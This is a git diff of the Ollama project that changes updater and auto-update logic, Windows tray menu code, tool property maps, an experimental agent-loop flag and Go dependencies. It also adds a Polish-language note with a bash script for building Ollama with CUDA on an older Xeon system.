if propMap, ok := propDef.(map[string]any); ok {
|
||||||
|
|
@ -1672,7 +1572,7 @@ func convertToOllamaTool(toolSchema map[string]any) api.Tool {
|
||||||
Type: api.PropertyType{getStringFromMap(propMap, "type", "string")},
|
Type: api.PropertyType{getStringFromMap(propMap, "type", "string")},
|
||||||
Description: getStringFromMap(propMap, "description", ""),
|
Description: getStringFromMap(propMap, "description", ""),
|
||||||
}
|
}
|
||||||
tool.Function.Parameters.Properties[propName] = prop
|
tool.Function.Parameters.Properties.Set(propName, prop)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -19,7 +19,6 @@ import (
|
||||||
"runtime"
|
"runtime"
|
||||||
"strconv"
|
"strconv"
|
||||||
"strings"
|
"strings"
|
||||||
"sync"
|
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"github.com/ollama/ollama/app/store"
|
"github.com/ollama/ollama/app/store"
|
||||||
|
|
@ -59,8 +58,7 @@ func (u *Updater) checkForUpdate(ctx context.Context) (bool, UpdateResponse) {
|
||||||
query := requestURL.Query()
|
query := requestURL.Query()
|
||||||
query.Add("os", runtime.GOOS)
|
query.Add("os", runtime.GOOS)
|
||||||
query.Add("arch", runtime.GOARCH)
|
query.Add("arch", runtime.GOARCH)
|
||||||
currentVersion := version.Version
|
query.Add("version", version.Version)
|
||||||
query.Add("version", currentVersion)
|
|
||||||
query.Add("ts", strconv.FormatInt(time.Now().Unix(), 10))
|
query.Add("ts", strconv.FormatInt(time.Now().Unix(), 10))
|
||||||
|
|
||||||
// The original macOS app used to use the device ID
|
// The original macOS app used to use the device ID
|
||||||
|
|
@ -133,27 +131,15 @@ func (u *Updater) checkForUpdate(ctx context.Context) (bool, UpdateResponse) {
|
||||||
}
|
}
|
||||||
|
|
||||||
func (u *Updater) DownloadNewRelease(ctx context.Context, updateResp UpdateResponse) error {
|
func (u *Updater) DownloadNewRelease(ctx context.Context, updateResp UpdateResponse) error {
|
||||||
// Create a cancellable context for this download
|
|
||||||
downloadCtx, cancel := context.WithCancel(ctx)
|
|
||||||
u.cancelDownloadLock.Lock()
|
|
||||||
u.cancelDownload = cancel
|
|
||||||
u.cancelDownloadLock.Unlock()
|
|
||||||
defer func() {
|
|
||||||
u.cancelDownloadLock.Lock()
|
|
||||||
u.cancelDownload = nil
|
|
||||||
u.cancelDownloadLock.Unlock()
|
|
||||||
cancel()
|
|
||||||
}()
|
|
||||||
|
|
||||||
// Do a head first to check etag info
|
// Do a head first to check etag info
|
||||||
req, err := http.NewRequestWithContext(downloadCtx, http.MethodHead, updateResp.UpdateURL, nil)
|
req, err := http.NewRequestWithContext(ctx, http.MethodHead, updateResp.UpdateURL, nil)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return err
|
return err
|
||||||
}
|
}
|
||||||
|
|
||||||
// In case of slow downloads, continue the update check in the background
|
// In case of slow downloads, continue the update check in the background
|
||||||
bgctx, bgcancel := context.WithCancel(downloadCtx)
|
bgctx, cancel := context.WithCancel(ctx)
|
||||||
defer bgcancel()
|
defer cancel()
|
||||||
go func() {
|
go func() {
|
||||||
for {
|
for {
|
||||||
select {
|
select {
|
||||||
|
|
@ -190,7 +176,6 @@ func (u *Updater) DownloadNewRelease(ctx context.Context, updateResp UpdateRespo
|
||||||
_, err = os.Stat(stageFilename)
|
_, err = os.Stat(stageFilename)
|
||||||
if err == nil {
|
if err == nil {
|
||||||
slog.Info("update already downloaded", "bundle", stageFilename)
|
slog.Info("update already downloaded", "bundle", stageFilename)
|
||||||
UpdateDownloaded = true
|
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -259,95 +244,34 @@ func cleanupOldDownloads(stageDir string) {
|
||||||
}
|
}
|
||||||
|
|
||||||
type Updater struct {
|
type Updater struct {
|
||||||
Store *store.Store
|
Store *store.Store
|
||||||
cancelDownload context.CancelFunc
|
|
||||||
cancelDownloadLock sync.Mutex
|
|
||||||
checkNow chan struct{}
|
|
||||||
}
|
|
||||||
|
|
||||||
// CancelOngoingDownload cancels any currently running download
|
|
||||||
func (u *Updater) CancelOngoingDownload() {
|
|
||||||
u.cancelDownloadLock.Lock()
|
|
||||||
defer u.cancelDownloadLock.Unlock()
|
|
||||||
if u.cancelDownload != nil {
|
|
||||||
slog.Info("cancelling ongoing update download")
|
|
||||||
u.cancelDownload()
|
|
||||||
u.cancelDownload = nil
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// TriggerImmediateCheck signals the background checker to check for updates immediately
|
|
||||||
func (u *Updater) TriggerImmediateCheck() {
|
|
||||||
if u.checkNow != nil {
|
|
||||||
u.checkNow <- struct{}{}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func (u *Updater) StartBackgroundUpdaterChecker(ctx context.Context, cb func(string) error) {
|
func (u *Updater) StartBackgroundUpdaterChecker(ctx context.Context, cb func(string) error) {
|
||||||
u.checkNow = make(chan struct{}, 1)
|
|
||||||
go func() {
|
go func() {
|
||||||
// Don't blast an update message immediately after startup
|
// Don't blast an update message immediately after startup
|
||||||
time.Sleep(UpdateCheckInitialDelay)
|
time.Sleep(UpdateCheckInitialDelay)
|
||||||
slog.Info("beginning update checker", "interval", UpdateCheckInterval)
|
slog.Info("beginning update checker", "interval", UpdateCheckInterval)
|
||||||
ticker := time.NewTicker(UpdateCheckInterval)
|
|
||||||
defer ticker.Stop()
|
|
||||||
|
|
||||||
for {
|
for {
|
||||||
|
available, resp := u.checkForUpdate(ctx)
|
||||||
|
if available {
|
||||||
|
err := u.DownloadNewRelease(ctx, resp)
|
||||||
|
if err != nil {
|
||||||
|
slog.Error(fmt.Sprintf("failed to download new release: %s", err))
|
||||||
|
} else {
|
||||||
|
err = cb(resp.UpdateVersion)
|
||||||
|
if err != nil {
|
||||||
|
slog.Warn(fmt.Sprintf("failed to register update available with tray: %s", err))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
select {
|
select {
|
||||||
case <-ctx.Done():
|
case <-ctx.Done():
|
||||||
slog.Debug("stopping background update checker")
|
slog.Debug("stopping background update checker")
|
||||||
return
|
return
|
||||||
case <-u.checkNow:
|
default:
|
||||||
// Immediate check triggered
|
time.Sleep(UpdateCheckInterval)
|
||||||
case <-ticker.C:
|
|
||||||
// Regular interval check
|
|
||||||
}
|
|
||||||
|
|
||||||
// Always check for updates
|
|
||||||
available, resp := u.checkForUpdate(ctx)
|
|
||||||
if !available {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
|
|
||||||
// Update is available - check if auto-update is enabled for downloading
|
|
||||||
settings, err := u.Store.Settings()
|
|
||||||
if err != nil {
|
|
||||||
slog.Error("failed to load settings", "error", err)
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
|
|
||||||
if !settings.AutoUpdateEnabled {
|
|
||||||
// Auto-update disabled - don't download, just log
|
|
||||||
slog.Debug("update available but auto-update disabled", "version", resp.UpdateVersion)
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
|
|
||||||
// Auto-update is enabled - download
|
|
||||||
err = u.DownloadNewRelease(ctx, resp)
|
|
||||||
if err != nil {
|
|
||||||
slog.Error("failed to download new release", "error", err)
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
|
|
||||||
// Download successful - show tray notification (regardless of toggle state)
|
|
||||||
err = cb(resp.UpdateVersion)
|
|
||||||
if err != nil {
|
|
||||||
slog.Warn("failed to register update available with tray", "error", err)
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}()
|
}()
|
||||||
}
|
}
|
||||||
|
|
||||||
func (u *Updater) CheckForUpdate(ctx context.Context) (bool, string, error) {
|
|
||||||
available, resp := u.checkForUpdate(ctx)
|
|
||||||
return available, resp.UpdateVersion, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
func (u *Updater) InstallAndRestart() error {
|
|
||||||
if !UpdateDownloaded {
|
|
||||||
return fmt.Errorf("no update downloaded")
|
|
||||||
}
|
|
||||||
|
|
||||||
slog.Info("installing update and restarting")
|
|
||||||
return DoUpgrade(true)
|
|
||||||
}
|
|
||||||
|
|
|
||||||
|
|
@ -85,17 +85,7 @@ func TestBackgoundChecker(t *testing.T) {
|
||||||
UpdateCheckURLBase = server.URL + "/update.json"
|
UpdateCheckURLBase = server.URL + "/update.json"
|
||||||
|
|
||||||
updater := &Updater{Store: &store.Store{}}
|
updater := &Updater{Store: &store.Store{}}
|
||||||
defer updater.Store.Close()
|
defer updater.Store.Close() // Ensure database is closed
|
||||||
|
|
||||||
settings, err := updater.Store.Settings()
|
|
||||||
if err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
settings.AutoUpdateEnabled = true
|
|
||||||
if err := updater.Store.SetSettings(settings); err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
|
|
||||||
updater.StartBackgroundUpdaterChecker(ctx, cb)
|
updater.StartBackgroundUpdaterChecker(ctx, cb)
|
||||||
select {
|
select {
|
||||||
case <-stallTimer.C:
|
case <-stallTimer.C:
|
||||||
|
|
|
||||||
|
|
@ -369,24 +369,24 @@ func (t *winTray) addSeparatorMenuItem(menuItemId, parentId uint32) error {
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (t *winTray) removeMenuItem(menuItemId, parentId uint32) error {
|
// func (t *winTray) hideMenuItem(menuItemId, parentId uint32) error {
|
||||||
const ERROR_SUCCESS syscall.Errno = 0
|
// const ERROR_SUCCESS syscall.Errno = 0
|
||||||
|
|
||||||
t.muMenus.RLock()
|
// t.muMenus.RLock()
|
||||||
menu := uintptr(t.menus[parentId])
|
// menu := uintptr(t.menus[parentId])
|
||||||
t.muMenus.RUnlock()
|
// t.muMenus.RUnlock()
|
||||||
res, _, err := pRemoveMenu.Call(
|
// res, _, err := pRemoveMenu.Call(
|
||||||
menu,
|
// menu,
|
||||||
uintptr(menuItemId),
|
// uintptr(menuItemId),
|
||||||
MF_BYCOMMAND,
|
// MF_BYCOMMAND,
|
||||||
)
|
// )
|
||||||
if res == 0 && err.(syscall.Errno) != ERROR_SUCCESS {
|
// if res == 0 && err.(syscall.Errno) != ERROR_SUCCESS {
|
||||||
return err
|
// return err
|
||||||
}
|
// }
|
||||||
t.delFromVisibleItems(parentId, menuItemId)
|
// t.delFromVisibleItems(parentId, menuItemId)
|
||||||
|
|
||||||
return nil
|
// return nil
|
||||||
}
|
// }
|
||||||
|
|
||||||
func (t *winTray) showMenu() error {
|
func (t *winTray) showMenu() error {
|
||||||
p := point{}
|
p := point{}
|
||||||
|
|
|
||||||
|
|
@ -30,7 +30,6 @@ var (
|
||||||
pPostQuitMessage = u32.NewProc("PostQuitMessage")
|
pPostQuitMessage = u32.NewProc("PostQuitMessage")
|
||||||
pRegisterClass = u32.NewProc("RegisterClassExW")
|
pRegisterClass = u32.NewProc("RegisterClassExW")
|
||||||
pRegisterWindowMessage = u32.NewProc("RegisterWindowMessageW")
|
pRegisterWindowMessage = u32.NewProc("RegisterWindowMessageW")
|
||||||
pRemoveMenu = u32.NewProc("RemoveMenu")
|
|
||||||
pSendMessage = u32.NewProc("SendMessageW")
|
pSendMessage = u32.NewProc("SendMessageW")
|
||||||
pSetForegroundWindow = u32.NewProc("SetForegroundWindow")
|
pSetForegroundWindow = u32.NewProc("SetForegroundWindow")
|
||||||
pSetMenuInfo = u32.NewProc("SetMenuInfo")
|
pSetMenuInfo = u32.NewProc("SetMenuInfo")
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,44 @@
|
||||||
|
---
|
||||||
|
|
||||||
|
### 2. `build_custom.sh` (Skrypt automatyzujący)
|
||||||
|
To jest opcja "Pro". Zamiast wklepywać te komendy ręcznie, tworzysz skrypt bashowy. Jak będziesz chciał zaktualizować Ollamę za pół roku, po prostu odpalisz `./build_custom.sh` i pójdziesz na kawę.
|
||||||
|
|
||||||
|
**Zawartość pliku:**
|
||||||
|
```bash
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Skrypt budowania Ollama dla Xeon X5675 (No AVX) + GTX 1070
|
||||||
|
# Uruchom to w głównym katalogu repozytorium
|
||||||
|
|
||||||
|
echo "--- [1/4] Czyszczenie poprzedniego builda ---"
|
||||||
|
rm -rf build
|
||||||
|
go clean -cache
|
||||||
|
|
||||||
|
echo "--- [2/4] Konfiguracja CMake (CUDA ON, Vulkan OFF) ---"
|
||||||
|
# Flagi kluczowe dla Twojego systemu
|
||||||
|
cmake -B build \
|
||||||
|
-DOLLAMA_CUDA=ON \
|
||||||
|
-DOLLAMA_VULKAN=OFF \
|
||||||
|
-DGGML_VULKAN=OFF \
|
||||||
|
-DCMAKE_DISABLE_FIND_PACKAGE_Vulkan=TRUE
|
||||||
|
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo "Błąd konfiguracji CMake!"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "--- [3/4] Kompilacja silnika (Tryb bezpieczny -j1) ---"
|
||||||
|
# Używamy -j1 bo przy OC Twój Xeon może być niestabilny przy kompilacji
|
||||||
|
cmake --build build -j1
|
||||||
|
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo "Błąd kompilacji!"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "--- [4/4] Budowanie pliku binarnego Go ---"
|
||||||
|
go build .
|
||||||
|
|
||||||
|
echo "--- GOTOWE! ---"
|
||||||
|
echo "Twój plik 'ollama' jest gotowy."
|
||||||
|
echo "Aby zainstalować wpisz: sudo mv ollama /usr/bin/ollama"
|
||||||
10
cmd/cmd.go
10
cmd/cmd.go
|
|
@ -45,6 +45,7 @@ import (
|
||||||
"github.com/ollama/ollama/types/model"
|
"github.com/ollama/ollama/types/model"
|
||||||
"github.com/ollama/ollama/types/syncmap"
|
"github.com/ollama/ollama/types/syncmap"
|
||||||
"github.com/ollama/ollama/version"
|
"github.com/ollama/ollama/version"
|
||||||
|
xcmd "github.com/ollama/ollama/x/cmd"
|
||||||
)
|
)
|
||||||
|
|
||||||
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
|
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
|
||||||
|
|
@ -517,6 +518,9 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
||||||
return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
|
return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Check for experimental flag
|
||||||
|
isExperimental, _ := cmd.Flags().GetBool("experimental")
|
||||||
|
|
||||||
if interactive {
|
if interactive {
|
||||||
if err := loadOrUnloadModel(cmd, &opts); err != nil {
|
if err := loadOrUnloadModel(cmd, &opts); err != nil {
|
||||||
var sErr api.AuthorizationError
|
var sErr api.AuthorizationError
|
||||||
|
|
@ -543,6 +547,11 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Use experimental agent loop with
|
||||||
|
if isExperimental {
|
||||||
|
return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive)
|
||||||
|
}
|
||||||
|
|
||||||
return generateInteractive(cmd, opts)
|
return generateInteractive(cmd, opts)
|
||||||
}
|
}
|
||||||
return generate(cmd, opts)
|
return generate(cmd, opts)
|
||||||
|
|
@ -1754,6 +1763,7 @@ func NewCLI() *cobra.Command {
|
||||||
runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
|
runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
|
||||||
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
|
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
|
||||||
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
|
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
|
||||||
|
runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
|
||||||
|
|
||||||
stopCmd := &cobra.Command{
|
stopCmd := &cobra.Command{
|
||||||
Use: "stop MODEL",
|
Use: "stop MODEL",
|
||||||
|
|
|
||||||
|
|
@ -40,6 +40,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
|
||||||
fmt.Fprintln(os.Stderr, " /bye Exit")
|
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||||
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
||||||
fmt.Fprintln(os.Stderr, " /? shortcuts Help for keyboard shortcuts")
|
fmt.Fprintln(os.Stderr, " /? shortcuts Help for keyboard shortcuts")
|
||||||
|
|
||||||
fmt.Fprintln(os.Stderr, "")
|
fmt.Fprintln(os.Stderr, "")
|
||||||
fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")
|
fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")
|
||||||
|
|
||||||
|
|
|
||||||
4
go.mod
4
go.mod
|
|
@ -28,6 +28,7 @@ require (
|
||||||
github.com/nlpodyssey/gopickle v0.3.0
|
github.com/nlpodyssey/gopickle v0.3.0
|
||||||
github.com/pdevine/tensor v0.0.0-20240510204454-f88f4562727c
|
github.com/pdevine/tensor v0.0.0-20240510204454-f88f4562727c
|
||||||
github.com/tkrajina/typescriptify-golang-structs v0.2.0
|
github.com/tkrajina/typescriptify-golang-structs v0.2.0
|
||||||
|
github.com/wk8/go-ordered-map/v2 v2.1.8
|
||||||
golang.org/x/image v0.22.0
|
golang.org/x/image v0.22.0
|
||||||
golang.org/x/mod v0.30.0
|
golang.org/x/mod v0.30.0
|
||||||
golang.org/x/tools v0.38.0
|
golang.org/x/tools v0.38.0
|
||||||
|
|
@ -36,6 +37,8 @@ require (
|
||||||
|
|
||||||
require (
|
require (
|
||||||
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 // indirect
|
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 // indirect
|
||||||
|
github.com/bahlo/generic-list-go v0.2.0 // indirect
|
||||||
|
github.com/buger/jsonparser v1.1.1 // indirect
|
||||||
github.com/bytedance/sonic/loader v0.1.1 // indirect
|
github.com/bytedance/sonic/loader v0.1.1 // indirect
|
||||||
github.com/chewxy/hm v1.0.0 // indirect
|
github.com/chewxy/hm v1.0.0 // indirect
|
||||||
github.com/chewxy/math32 v1.11.0 // indirect
|
github.com/chewxy/math32 v1.11.0 // indirect
|
||||||
|
|
@ -45,6 +48,7 @@ require (
|
||||||
github.com/gogo/protobuf v1.3.2 // indirect
|
github.com/gogo/protobuf v1.3.2 // indirect
|
||||||
github.com/google/flatbuffers v24.3.25+incompatible // indirect
|
github.com/google/flatbuffers v24.3.25+incompatible // indirect
|
||||||
github.com/kr/text v0.2.0 // indirect
|
github.com/kr/text v0.2.0 // indirect
|
||||||
|
github.com/mailru/easyjson v0.7.7 // indirect
|
||||||
github.com/pkg/errors v0.9.1 // indirect
|
github.com/pkg/errors v0.9.1 // indirect
|
||||||
github.com/pmezard/go-difflib v1.0.0 // indirect
|
github.com/pmezard/go-difflib v1.0.0 // indirect
|
||||||
github.com/rivo/uniseg v0.2.0 // indirect
|
github.com/rivo/uniseg v0.2.0 // indirect
|
||||||
|
|
|
||||||
9
go.sum
9
go.sum
|
|
@ -14,7 +14,11 @@ github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 h1:q4dksr6IC
|
||||||
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40/go.mod h1:Q7yQnSMnLvcXlZ8RV+jwz/6y1rQTqbX6C82SndT52Zs=
|
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40/go.mod h1:Q7yQnSMnLvcXlZ8RV+jwz/6y1rQTqbX6C82SndT52Zs=
|
||||||
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q=
|
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q=
|
||||||
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE=
|
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE=
|
||||||
|
github.com/bahlo/generic-list-go v0.2.0 h1:5sz/EEAK+ls5wF+NeqDpk5+iNdMDXrh3z3nPnH1Wvgk=
|
||||||
|
github.com/bahlo/generic-list-go v0.2.0/go.mod h1:2KvAjgMlE5NNynlg/5iLrrCCZ2+5xWbdbCW3pNTGyYg=
|
||||||
github.com/boombuler/barcode v1.0.0/go.mod h1:paBWMcWSl3LHKBqUq+rly7CNSldXjb2rDl3JlRe0mD8=
|
github.com/boombuler/barcode v1.0.0/go.mod h1:paBWMcWSl3LHKBqUq+rly7CNSldXjb2rDl3JlRe0mD8=
|
||||||
|
github.com/buger/jsonparser v1.1.1 h1:2PnMjfWD7wBILjqQbt530v576A/cAbQvEW9gGIpYMUs=
|
||||||
|
github.com/buger/jsonparser v1.1.1/go.mod h1:6RYKKt7H4d4+iWqouImQ9R2FZql3VbhNgx27UK13J/0=
|
||||||
github.com/bytedance/sonic v1.11.6 h1:oUp34TzMlL+OY1OUWxHqsdkgC/Zfc85zGqw9siXjrc0=
|
github.com/bytedance/sonic v1.11.6 h1:oUp34TzMlL+OY1OUWxHqsdkgC/Zfc85zGqw9siXjrc0=
|
||||||
github.com/bytedance/sonic v1.11.6/go.mod h1:LysEHSvpvDySVdC2f87zGWf6CIKJcAvqab1ZaiQtds4=
|
github.com/bytedance/sonic v1.11.6/go.mod h1:LysEHSvpvDySVdC2f87zGWf6CIKJcAvqab1ZaiQtds4=
|
||||||
github.com/bytedance/sonic/loader v0.1.1 h1:c+e5Pt1k/cy5wMveRDyk2X4B9hF4g7an8N3zCYjJFNM=
|
github.com/bytedance/sonic/loader v0.1.1 h1:c+e5Pt1k/cy5wMveRDyk2X4B9hF4g7an8N3zCYjJFNM=
|
||||||
|
|
@ -123,6 +127,7 @@ github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+
|
||||||
github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw=
|
github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw=
|
||||||
github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
|
github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
|
||||||
github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
|
github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
|
||||||
|
github.com/josharian/intern v1.0.0/go.mod h1:5DoeVV0s6jJacbCEi61lwdGj/aVlrQvzHFFd8Hwg//Y=
|
||||||
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
|
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
|
||||||
github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
|
github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
|
||||||
github.com/jung-kurt/gofpdf v1.0.0/go.mod h1:7Id9E/uU8ce6rXgefFLlgrJj/GYY22cpxn+r32jIOes=
|
github.com/jung-kurt/gofpdf v1.0.0/go.mod h1:7Id9E/uU8ce6rXgefFLlgrJj/GYY22cpxn+r32jIOes=
|
||||||
|
|
@ -143,6 +148,8 @@ github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728 h1:QwWKgMY28TAXaDl+
|
||||||
github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728/go.mod h1:1fEHWurg7pvf5SG6XNE5Q8UZmOwex51Mkx3SLhrW5B4=
|
github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728/go.mod h1:1fEHWurg7pvf5SG6XNE5Q8UZmOwex51Mkx3SLhrW5B4=
|
||||||
github.com/leodido/go-urn v1.4.0 h1:WT9HwE9SGECu3lg4d/dIA+jxlljEa1/ffXKmRjqdmIQ=
|
github.com/leodido/go-urn v1.4.0 h1:WT9HwE9SGECu3lg4d/dIA+jxlljEa1/ffXKmRjqdmIQ=
|
||||||
github.com/leodido/go-urn v1.4.0/go.mod h1:bvxc+MVxLKB4z00jd1z+Dvzr47oO32F/QSNjSBOlFxI=
|
github.com/leodido/go-urn v1.4.0/go.mod h1:bvxc+MVxLKB4z00jd1z+Dvzr47oO32F/QSNjSBOlFxI=
|
||||||
|
github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0=
|
||||||
|
github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc=
|
||||||
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
|
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
|
||||||
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
|
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
|
||||||
github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
|
github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
|
||||||
|
|
@ -207,6 +214,8 @@ github.com/twitchyliquid64/golang-asm v0.15.1 h1:SU5vSMR7hnwNxj24w34ZyCi/FmDZTkS
|
||||||
github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08=
|
github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08=
|
||||||
github.com/ugorji/go/codec v1.2.12 h1:9LC83zGrHhuUA9l16C9AHXAqEV/2wBQ4nkvumAE65EE=
|
github.com/ugorji/go/codec v1.2.12 h1:9LC83zGrHhuUA9l16C9AHXAqEV/2wBQ4nkvumAE65EE=
|
||||||
github.com/ugorji/go/codec v1.2.12/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg=
|
github.com/ugorji/go/codec v1.2.12/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg=
|
||||||
|
github.com/wk8/go-ordered-map/v2 v2.1.8 h1:5h/BUHu93oj4gIdvHHHGsScSTMijfx5PeYkE/fJgbpc=
|
||||||
|
github.com/wk8/go-ordered-map/v2 v2.1.8/go.mod h1:5nJHM5DyteebpVlHnWMV0rPz6Zp7+xBAnxjb1X5vnTw=
|
||||||
github.com/x448/float16 v0.8.4 h1:qLwI1I70+NjRFUR3zs1JPUCgaCXSh3SW62uAKT1mSBM=
|
github.com/x448/float16 v0.8.4 h1:qLwI1I70+NjRFUR3zs1JPUCgaCXSh3SW62uAKT1mSBM=
|
||||||
github.com/x448/float16 v0.8.4/go.mod h1:14CWIYCyZA/cWjXOioeEpHeN/83MdbZDRQHoFcYsOfg=
|
github.com/x448/float16 v0.8.4/go.mod h1:14CWIYCyZA/cWjXOioeEpHeN/83MdbZDRQHoFcYsOfg=
|
||||||
github.com/xtgo/set v1.0.0 h1:6BCNBRv3ORNDQ7fyoJXRv+tstJz3m1JVFQErfeZz2pY=
|
github.com/xtgo/set v1.0.0 h1:6BCNBRv3ORNDQ7fyoJXRv+tstJz3m1JVFQErfeZz2pY=
|
||||||
|
|
|
||||||
|
|
@ -11,6 +11,15 @@ import (
|
||||||
"github.com/ollama/ollama/api"
|
"github.com/ollama/ollama/api"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
|
||||||
|
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
